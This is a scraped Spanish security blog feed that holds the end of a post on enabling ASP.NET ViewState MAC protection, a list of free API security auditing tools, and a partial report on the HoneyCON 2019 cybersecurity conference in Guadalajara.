<div style="background: #EEEDEA; border: solid #CEC9C4 1.0pt; mso-border-alt: solid #CEC9C4 .75pt; mso-element: para-border-div; padding: 8.0pt 8.0pt 8.0pt 8.0pt;">
<div class="MsoNormal" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: none; line-height: 16.8pt; margin-bottom: 0.0001pt; padding: 0cm; vertical-align: baseline;">
<pages enableViewStateMac="true" /><o:p></o:p></div>
</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
También se puede habilitar de manera individual por página:<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div style="background: #EEEDEA; border: solid #CEC9C4 1.0pt; mso-border-alt: solid #CEC9C4 .75pt; mso-element: para-border-div; padding: 8.0pt 8.0pt 8.0pt 8.0pt;">
<pre style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: none; line-height: 16.8pt; padding: 0cm; vertical-align: baseline;"><span style="font-family: Calibri, sans-serif; font-size: 11pt;"><%</span><span style="box-sizing: border-box; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit;">@ </span><span style="box-sizing: border-box; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit;">Page </span><span style="box-sizing: border-box; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit;">EnableViewStateMac</span><span style="box-sizing: border-box; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit;">="true" </span><span style="box-sizing: border-box; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit;">%></span><span style="font-family: "Calibri",sans-serif; font-size: 11.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"><o:p></o:p></span></pre>
</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<h3>
Fuentes:</h3>
<h2>
<o:p></o:p></h2>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l1 level1 lfo2; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "Times New Roman"; font-size: 7pt; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal;">
</span></span><!--[endif]--><a href="https://portswigger.net/kb/issues/00400600_asp-net-viewstate-without-mac-enabled">https://portswigger.net/kb/issues/00400600_asp-net-viewstate-without-mac-enabled</a><o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l1 level1 lfo2; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "Times New Roman"; font-size: 7pt; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal;">
</span></span><!--[endif]--><a href="https://cwe.mitre.org/data/definitions/642.html">https://cwe.mitre.org/data/definitions/642.html</a><o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l1 level1 lfo2; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "Times New Roman"; font-size: 7pt; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal;">
</span></span><!--[endif]--><a href="https://www.acunetix.com/vulnerabilities/web/view-state-mac-disabled/">https://www.acunetix.com/vulnerabilities/web/view-state-mac-disabled/</a><o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l1 level1 lfo2; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "Times New Roman"; font-size: 7pt; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal;">
</span></span><!--[endif]--><a href="http://eagle-site.blogspot.com/2010/01/viewstate-replay-attack.html">http://eagle-site.blogspot.com/2010/01/viewstate-replay-attack.html</a><o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l1 level1 lfo2; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "Times New Roman"; font-size: 7pt; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal;">
</span></span><!--[endif]--><a href="https://yourwebsitefirst.com/how-to-prevent-replay-attacks-on-your-website/">https://yourwebsitefirst.com/how-to-prevent-replay-attacks-on-your-website/</a><o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l1 level1 lfo2; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "Times New Roman"; font-size: 7pt; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal;">
</span></span><!--[endif]--><a href="https://www.sitepoint.com/how-to-prevent-replay-attacks-on-your-website/">https://www.sitepoint.com/how-to-prevent-replay-attacks-on-your-website/</a><o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l1 level1 lfo2; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "Times New Roman"; font-size: 7pt; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal;">
</span></span><!--[endif]--><a href="https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/">https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/</a><o:p></o:p></div>
<div class="MsoListParagraphCxSpLast" style="mso-list: l1 level1 lfo2; text-indent: -18.0pt;">
<!--[if !supportLists]--><span class="MsoHyperlink"><span style="color: windowtext; font-family: Symbol;">·<span style="font-family: "Times New Roman"; font-size: 7pt; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal;">
</span></span></span><!--[endif]--><a href="https://www.troyhunt.com/understanding-and-testing-for-view/">https://www.troyhunt.com/understanding-and-testing-for-view/</a><span class="MsoHyperlink"><span style="color: windowtext;"><o:p></o:p></span></span></div>
<span style="font-family: "Calibri",sans-serif; font-size: 11.0pt; line-height: 107%; mso-ansi-language: ES; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"><a href="https://docs.microsoft.com/en-us/dotnet/api/system.web.ui.page.enableviewstatemac?redirectedfrom=MSDN&view=netframework-4.8#System_Web_UI_Page_EnableViewStateMac">https://docs.microsoft.com/en-us/dotnet/api/system.web.ui.page.enableviewstatemac?redirectedfrom=MSDN&view=netframework-4.8#System_Web_UI_Page_EnableViewStateMac</a></span>Raul Renaleshttp://www.blogger.com/profile/00004470679001888541noreply@blogger.com19248 Hita, Guadalajara, Guadalajara, Spain40.8234946 -3.048543500000050740.8114791 -3.0687135000000505 40.835510099999993 -3.0283735000000509tag:blogger.com,1999:blog-4789894782637921835.post-57998605767091575022019-11-22T06:20:00.002+01:002020-02-07T13:09:43.896+01:00Arsenal de herramientas para auditar la seguridad de tu API<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYZ2Ca32n2_miIDzqcvO4kwMvSIQB1PLklZ6hmKRNrneQIZaqqhPfrFqDIxleSghzpsUPGHbyqAypridauqe20StP6bSlIvCV0yb65botp51zuNkVD2IG1j-oGbviaTuEpMxHgh6zkTI3X/s1600/APIs.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="206" data-original-width="750" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYZ2Ca32n2_miIDzqcvO4kwMvSIQB1PLklZ6hmKRNrneQIZaqqhPfrFqDIxleSghzpsUPGHbyqAypridauqe20StP6bSlIvCV0yb65botp51zuNkVD2IG1j-oGbviaTuEpMxHgh6zkTI3X/s640/APIs.jpg" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
By @raulrenales & @db3rn4l</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
En las últimas fechas mi compañero David (@db3rn4l) estamos
trabajando con diferentes APIs auditando su seguridad, en este sentido creamos
este post para tener un arsenal de herramientas que nos permitan trabajar en las
auditorias de este tipo.</div>
<a name='more'></a><br />
<o:p></o:p>
<br />
<h4>
Recursos Gratuitos:</h4>
<br />
<ul>
<li><b>Susanoo</b> (https://github.com/ant4g0nist/Susanoo: Formatos de entrada y salida configurables, Scanner de vulnerabilidades: IDOR, Auth issues, SQLi,Error stacks. Smoke Scan.</li>
<li><b>AppSecurityApi</b> (https://github.com/01org/AppSecurityApi)</li>
<li><b>SOAPui </b>(https://www.soapui.org/) (Aporte de @kinomakino)</li>
<li><b>ZapProxy</b> (https://zaproxy.blogspot.com/2017/04/exploring-apis-with-zap.html)</li>
<li><a href="https://honeysec.blogspot.com/2020/01/astra-rest-api-penetration-testing.html#more"><b>ASTRA (Ver nuestra Review)</b> </a>(https://github.com/flipkart-incubator/Astra): Multiples vulnerabilidades: Sqli, XSS, Information leak, Broken auth, CSRF, Rate limit, CORS, JWT atack, CRLF detection, Blind XXEi.</li>
<li><b><a href="https://honeysec.blogspot.com/2020/01/vooki-rest-api-scanner.html">Vooki</a><a href="https://honeysec.blogspot.com/2020/01/vooki-rest-api-scanner.html">: (Ver nuestra Review) </a></b>escáner de vulnerabilidades de aplicaciones web gratuito que nos brinda un informe de escaneo perfecto sobre las redes escaneadas, las aplicaciones. Es una herramienta fácil de usar que puede escanear fácilmente cualquier aplicación web y encontrar vulnerabilidades de seguridad. Vooki incluye el escáner de aplicaciones web, el escáner API Rest y la sección de informes. (<a href="https://www.vegabird.com/vooki/">https://www.vegabird.com/vooki/</a>) (Aporte de Jorge Enrique Zipa - <a href="https://www.linkedin.com/in/jorge-zipa/">https://www.linkedin.com/in/jorge-zipa/</a>)</li>
<li><b>RestClient</b>: Firefox-addon (<a href="https://addons.mozilla.org/es/firefox/addon/restclient/">https://addons.mozilla.org/es/firefox/addon/restclient/</a>) - RESTClient admite todos los métodos HTTP RFC2616 (HTTP / 1.1) y RFC2518 (WebDAV). Puede construir una solicitud HTTP personalizada (método personalizado con recursos URI y cuerpo de solicitud HTTP) para probar directamente las solicitudes en un servidor.</li>
<li><b>FuzzAPI </b>(<a href="https://github.com/Fuzzapi/fuzzapi">https://github.com/Fuzzapi/fuzzapi</a>)</li>
<li><b>Postman:</b> (<a href="https://www.postman.com/">https://www.postman.com/</a>)</li>
<li><b>Apisecurity.io: </b>Las últimas noticias de seguridad API, vulnerabilidades y mejores prácticas (<a href="https://apisecurity.io/">https://apisecurity.io/</a>)</li>
</ul>
<br />
Recursos de lectura:<br />
<br />
<ul>
<li>https://blog.gfi.es/seguridad-en-tus-apis/</li>
<li>https://www.adictosaltrabajo.com/2017/09/25/securizar-un-api-rest-utilizando-json-web-tokens/</li>
<li><a href="http://blog.intothesymmetry.com/2015/12/top-10-oauth-2-implementation.html">http://blog.intothesymmetry.com/2015/12/top-10-oauth-2-implementation.html</a></li>
</ul>
<div>
Artículos relacionados de este Blog:</div>
<ul>
<li>OWASP API TOP 10: <a href="https://honeysec.blogspot.com/2020/01/owasp-api-security-top-10.html">https://honeysec.blogspot.com/2020/01/owasp-api-security-top-10.html</a></li>
<li>ASTRA: <a href="https://www.linkedin.com/pulse/auditoria-de-api-rest-david-bernal/">https://www.linkedin.com/pulse/auditoria-de-api-rest-david-bernal/</a></li>
<li>VOOKI: <a href="https://honeysec.blogspot.com/2020/01/vooki-rest-api-scanner.html">https://honeysec.blogspot.com/2020/01/vooki-rest-api-scanner.html</a></li>
<li>CABECERAS: <a href="https://honeysec.blogspot.com/2020/02/como-configurar-las-cabeceras-de.html">https://honeysec.blogspot.com/2020/02/como-configurar-las-cabeceras-de.html</a></li>
</ul>
<br />
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt; line-height: 107%;"><br /></span>
<span style="font-family: "calibri" , sans-serif; font-size: 11.0pt; line-height: 107%;">Nota: Iremos editando y ampliando este post con las
herramientas que vayamos encontrando y con algunas operativas de uso de las
mismas.</span>Raul Renaleshttp://www.blogger.com/profile/00004470679001888541noreply@blogger.com0tag:blogger.com,1999:blog-4789894782637921835.post-2054147053561763852019-11-10T23:20:00.000+01:002019-11-22T23:31:54.794+01:00HoneyCON 2019<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDA2RfagrW1oz_Px5pCzN7BW5wlQ6zKCG7GjFjAawnIz_7h8CxBJ2_333dPO4ebv9yTAVomQFd7iFYxzW4j8aRIy4orwS3o0xSmDmgUCmHauGY3ICEJNVxoAmra0Cyt4n5OzDNSjI-UUwF/s1600/honeyteam.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1068" data-original-width="1600" height="426" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDA2RfagrW1oz_Px5pCzN7BW5wlQ6zKCG7GjFjAawnIz_7h8CxBJ2_333dPO4ebv9yTAVomQFd7iFYxzW4j8aRIy4orwS3o0xSmDmgUCmHauGY3ICEJNVxoAmra0Cyt4n5OzDNSjI-UUwF/s640/honeyteam.jpg" width="640" /></a></div>
<br />
<div style="text-align: justify;">
Por quinto año consecutivo se celebró el Congreso de Seguridad Informática Ciudad de Guadalajara, que tras una dura semana de trabajo cerró con un nuevo récord de participación, dejando a Guadalajara como referente de la Ciberseguridad por unos días.
</div>
<a name='more'></a><br />
<b id="docs-internal-guid-d6dbee4d-7fff-4794-9ee1-f9c6d378837c" style="font-weight: normal;"><br /></b>
<br />
<div style="text-align: justify;">
Con motivo de su quinto aniversario el Congreso decidió ampliar su oferta de actividades y sedes, con el objetivo de acercar la concienciacion en Ciberseguridad a diversos ámbitos como la educación, la empresa, la formación técnica y las familias, de esta manera se configuró la primera Security Week de Guadalajara que ha contado con una participación cercana a las 1600 personas a lo largo de toda la semana.
<b style="font-weight: normal;"><br /></b>
</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjvH8MbRewUarU9lkqec4Cs7tgIwITwwDXJZgQrXJOyQJmhSqn_H4yb0OjlH3CJ6QD6Eba2B3_Wn1uesg2rv9ZR3soNIR1f1Lms7da7r4mjy4o-ErUfzChoJByVOeUXQVh-SAB-vbIcBMa/s1600/56c7c076-35f7-465d-a1bd-6eaddf0faecf.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="404" data-original-width="1600" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjvH8MbRewUarU9lkqec4Cs7tgIwITwwDXJZgQrXJOyQJmhSqn_H4yb0OjlH3CJ6QD6Eba2B3_Wn1uesg2rv9ZR3soNIR1f1Lms7da7r4mjy4o-ErUfzChoJByVOeUXQVh-SAB-vbIcBMa/s640/56c7c076-35f7-465d-a1bd-6eaddf0faecf.jpg" width="640" /></a></div>
<b style="font-weight: normal;"><br /></b>
<b style="font-weight: normal;"><br /></b>
<br />
<div style="text-align: justify;">
Para iniciar las actividades y durante los primeros días de la semana se realizaron diferentes talleres técnicos de análisis de malware, muy de actualidad dado los ataques a compañías españolas como la SER o Everis, Talleres de análisis forense y extracción de evidencias en móviles, que permitieron a los asociados formarse con material de primer nivel mejorando así su cualificación.
<b style="font-weight: normal;"><br /></b>
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh325BeoUjTp0IrJuXUU2bPDQn4LC_Ki5Jp2q86sjhTFTxs4oHBYZs6COT9Xu0lqj2EmSWgZOkYrQRc3ZhWLZ3UosdKiRjssK3awO6AQYVPhyLW0eBKM3eQOIbTjTcnaxOphyphenhyphenltYo8C7Xn9/s1600/IESBrianda_Raul.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="228" data-original-width="479" height="304" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh325BeoUjTp0IrJuXUU2bPDQn4LC_Ki5Jp2q86sjhTFTxs4oHBYZs6COT9Xu0lqj2EmSWgZOkYrQRc3ZhWLZ3UosdKiRjssK3awO6AQYVPhyLW0eBKM3eQOIbTjTcnaxOphyphenhyphenltYo8C7Xn9/s640/IESBrianda_Raul.JPG" width="640" /></a></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div style="text-align: justify;">
<b style="font-weight: normal;">También se visitaron centros educativos como el IES Brianda de Mendoza, que en la mañana de jueves realizó una jornada en la que se habló de desarrollo seguro y fortificación de máquinas, a las que asistieron más de 100 alumnos de sus grados superiores y medios relacionados con Informática.</b></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKUjQZFc4bIjtlvaCSRcWT16zRwBurFTivUuG9tmuluROA-qxK4XRs3pM4WhZUF5DvIoYoFYtFA0OljuZQCLULtx_K8338qLJHbrR3NMN_2crfhO1N_NLntqwZYvwZANdYNqvHgj_Suib2/s1600/hackandbeers.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="840" data-original-width="1013" height="530" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKUjQZFc4bIjtlvaCSRcWT16zRwBurFTivUuG9tmuluROA-qxK4XRs3pM4WhZUF5DvIoYoFYtFA0OljuZQCLULtx_K8338qLJHbrR3NMN_2crfhO1N_NLntqwZYvwZANdYNqvHgj_Suib2/s640/hackandbeers.jpg" width="640" /></a></div>
<br />
<span style="text-align: justify;">La jornada de jueves fue clausurada con un espectacular Hack and Beers, probablemente el mejor de los cinco celebrados, que trajo al centro de Guadalajara charlas en formato distendido de expertos en su materia y que este año se celebraron en la conocida cervecería “El irlandés Errante”. Disfrutamos mucho de las charlas de José Manuel Vera, Samuel Lopez y Jose Antonio Jimenez, los cuales nos hablaron de Cine y Hackers, Pentest de apis y creación de vacunas mediante el análisis de malware.</span><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihYJi6IO7heShqQlP09z1dEQsQpodjGT7_eScW3yUj8-_oZ8xaHVMf60ZYvHhrc_mfswu0kPHqxmrWUHJlYjxwYc4yUQHAutn-ItGBaUkl9rJ0EF6gBdlL_cTljq3JTNfCgefvLZykoaAE/s1600/Charlas.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihYJi6IO7heShqQlP09z1dEQsQpodjGT7_eScW3yUj8-_oZ8xaHVMf60ZYvHhrc_mfswu0kPHqxmrWUHJlYjxwYc4yUQHAutn-ItGBaUkl9rJ0EF6gBdlL_cTljq3JTNfCgefvLZykoaAE/s640/Charlas.jpg" width="640" /></a></div>
<br />
<div style="text-align: justify;">
El viernes tarde disfrutamos de las ya tradicionales ponencias sobre seguridad que este año fueron abiertas por Lorenzo Martinez y sus “Memorias de un forense” que fueron muy del agrado de los asistentes. A esta charla le siguieron las de Iván Portillo/Gonzalo Espinosa y su OSINT, Análisis forense de la deepweb por parte de Manuel Guerra, Ideas locas de Pablo González y clausuramos la jornada con un poquito de historia naval de la mano de David Melendez.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Durante esta jornada de viernes también se celebró la cena de hermandad, abierta a todos los públicos, en la que como todos los años, ponentes, organización y público nos sentamos en torno a una mesa para disfrutar de estas jornadas. Agradecer una vez más al Grupo Lino por su trato.
<b style="font-weight: normal;"><br /></b>
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip1Tja8xWRSn_mdP74QOvQZdM2FG0JicUDuvLDVior773AM9lLrDX379X_8Pird3IVSpt2lXo1ksEkdnk9Muv5x6rXVGNCoaGcmvzzhAPlk-Ex9gOaZg6cPDB3MpjhVPX3SZKs9MK06kYV/s1600/Tallernacho.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="900" data-original-width="1600" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip1Tja8xWRSn_mdP74QOvQZdM2FG0JicUDuvLDVior773AM9lLrDX379X_8Pird3IVSpt2lXo1ksEkdnk9Muv5x6rXVGNCoaGcmvzzhAPlk-Ex9gOaZg6cPDB3MpjhVPX3SZKs9MK06kYV/s640/Tallernacho.jpg" width="640" /></a></div>
<b style="font-weight: normal;"><br /></b>
<b style="font-weight: normal;"><br /></b>
<br />
<br />
<div style="text-align: justify;">
Durante el sábado mañana se celebraron los talleres técnicos en los que se observó un aumento en la calidad de los contenidos, recibiendo a los principales expertos del sector que compartieron sus experiencias con los asistentes al evento. Contamos con la presencia de Nacho Brihuega y su pentesting 4ever, Pablo González nos habló de pivoting, Alonso Gutierrez y Carolina Gomez pescaron phishers y Jordi Ubach nos habló de seguridad en entornos industriales. <b style="font-weight: normal;"><br /></b>
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
En la misma jornada de sábado, se abrió el congreso a las familias realizando talleres para niños, talleres de concienciación y talleres para padres de la mano de uno de los mayores expertos en tecnologías e infancia, Angel Pablo Avilés. En esta jornada se aprovechó para presentar la aplicación STOP Bulling realizada por un alcarreño, Iñaki Magro, que a sus 19 años ha tenido la valentía de romper el acoso que sufrió creando esta app y explicando a padres y niños su experiencia con el objetivo de poder sensibilizar a los asistentes en la lucha contra el ciberacoso.</div>
<br />
<br />
<h2>
<b>
Menciones honoríficas
</b></h2>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2kHNXC2CC_7rFw49763sMEk7AUPvqDysHb2OnV-5p1drRhyphenhyphenXPhVdcrLakylsYhM97OQj-HNZWA0tyml_8OmQzBjIiXP26Ejmh6B6qWuizScNX9Td-rUylvnsAUZvZCdRdYGhY3Vw3fJ3O/s1600/honores.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1200" data-original-width="1600" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2kHNXC2CC_7rFw49763sMEk7AUPvqDysHb2OnV-5p1drRhyphenhyphenXPhVdcrLakylsYhM97OQj-HNZWA0tyml_8OmQzBjIiXP26Ejmh6B6qWuizScNX9Td-rUylvnsAUZvZCdRdYGhY3Vw3fJ3O/s640/honores.jpg" width="640" /></a></div>
<br />
A lo largo del congreso se realizaron diversas menciones honoríficas, poniendo en valor a las personas que nos han acompañado durante los últimos 5 años y que siempre que hemos necesitado algo han estado dispuestas para ayudar. El listado de menciones son:
<br />
<br />
<ul style="margin-bottom: 0; margin-top: 0;">
<li dir="ltr" style="background-color: transparent; color: #201c1d; font-family: Arial; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><div dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #201c1d; font-family: "arial"; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Excma. Diputación de Guadalajara</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #201c1d; font-family: Arial; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><div dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #201c1d; font-family: "arial"; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Junta de Comunidades de Castilla -La Mancha</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #201c1d; font-family: Arial; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><div dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #201c1d; font-family: "arial"; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">UNED Guadalajara</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #201c1d; font-family: Arial; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><div dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #201c1d; font-family: "arial"; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Jose Aurelio Garcia </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #201c1d; font-family: Arial; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><div dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #201c1d; font-family: "arial"; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">MorterueloCon</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #201c1d; font-family: Arial; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><div dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #201c1d; font-family: "arial"; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Jornadas X1RedMasSegura</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #201c1d; font-family: Arial; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><div dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #201c1d; font-family: "arial"; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">SmartHC</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #201c1d; font-family: Arial; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><div dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #201c1d; font-family: "arial"; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">PilarCon</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #201c1d; font-family: Arial; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><div dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #201c1d; font-family: "arial"; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Manuel Guerra</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #201c1d; font-family: Arial; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><div dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #201c1d; font-family: "arial"; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Pablo Gonzalez</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #201c1d; font-family: Arial; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><div dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
